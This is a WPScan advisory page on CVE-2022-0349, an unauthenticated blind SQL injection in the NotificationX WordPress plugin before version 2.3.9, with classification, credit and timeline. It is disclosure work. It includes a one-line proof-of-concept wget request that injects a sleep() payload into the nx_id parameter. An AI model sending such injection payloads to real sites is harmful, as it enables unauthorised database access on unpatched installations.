WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

NotificationX < 2.3.9 - Unauthenticated Blind SQL Injection

Description

The plugin does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection

Proof of Concept

time wget 'https://example.com/?rest_route=/notificationx/v1/analytics' --post-data="nx_id=sleep(2) -- x" -q -O-

Affects Plugins

notificationx
Fixed in version 2.3.9

References

CVE
CVE-2022-0349

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
1d0dd7be-29f3-4043-a9c6-67d02746463a

Timeline

Publicly Published

2022-02-02 (about 8 months ago)

Added

2022-02-02 (about 8 months ago)

Last Updated

2022-04-13 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin